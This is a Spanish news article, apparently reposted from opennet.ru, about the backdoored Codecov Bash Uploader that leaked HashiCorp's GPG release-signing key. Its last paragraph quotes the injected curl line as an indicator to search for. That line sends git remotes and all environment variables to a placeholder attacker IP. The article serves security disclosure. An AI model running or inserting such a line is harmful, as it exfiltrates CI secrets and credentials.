La inyección de código malicioso en el script de Codecov llevó a la compromisión de la clave PGP de HashiCorp.

La empresa HashiCorp, conocida por el desarrollo de herramientas de código abierto como Vagrant, Packer, Nomad y Terraform, ha anunciado la filtración de una clave GPG privada utilizada para crear firmas digitales que verifican las versiones. Los atacantes que accedieron a la clave GPG podrían haber realizado cambios encubiertos en los productos de HashiCorp, validándolos con una firma digital correcta. Sin embargo, la empresa informó que, tras una auditoría, no se encontraron rastros de intentos de modificaciones similares.

Actualmente, se ha revocado la clave GPG comprometida y se ha introducido una nueva clave. El problema solo afectó a la verificación a través de los archivos SHA256SUM y SHA256SUM.sig, y no impactó en la formación de firmas digitales para los paquetes DEB y RPM de Linux, que se distribuyen a través de releases.hashicorp.com, así como en los mecanismos de validación de lanzamientos para macOS y Windows (AuthentiCode).

La filtración ocurrió debido al uso de un script Codecov Bash Uploader (codecov-bash) en la infraestructura, el cual está diseñado para cargar informes de cobertura desde sistemas de integración continua. Durante un ataque a la empresa Codecov, se insertó un backdoor en dicho script, a través del cual se enviaron contraseñas y claves de cifrado a servidor de los atacantes.

Para llevar a cabo el ataque, los atacantes aprovecharon una vulnerabilidad en el proceso de creación de la imagen Docker de Codecov, que permitía extraer datos de acceso a GCS (Google Cloud Storage), necesarios para modificar el script Bash Uploader, el cual se distribuía desde el sitio codecov.io. Los cambios se realizaron el 31 de enero y permanecieron sin ser detectados durante dos meses, permitiendo a los delincuentes extraer información almacenada en los entornos de los sistemas de integración continua de los clientes. Con el código malicioso añadido, los atacantes pudieron obtener información sobre el repositorio Git probado y todas las variables de entorno, incluidas las que contenían tokens, claves de cifrado y contraseñas, transmitidas a los sistemas de integración continua para facilitar el acceso al código de aplicaciones, repositorios y servicios como Amazon Web Services y GitHub.

Además de la llamada directa, el script Codecov Bash Uploader fue utilizado como parte de otros cargadores, como Codecov-action (Github), Codecov-circleci-orb y Codecov-bitrise-step, cuyos usuarios también se ven afectados por el problema. Se recomienda a todos los usuarios de codecov-bash y productos relacionados realizar una auditoría de sus infraestructuras, así como cambiar contraseñas y claves de cifrado. Se puede verificar la presencia de un backdoor en el script buscando la cadena curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://<IP-del-servidor-atacante>/upload/v2 || true

Fuente: opennet.ru

Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS 🔥 Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS | ProHoster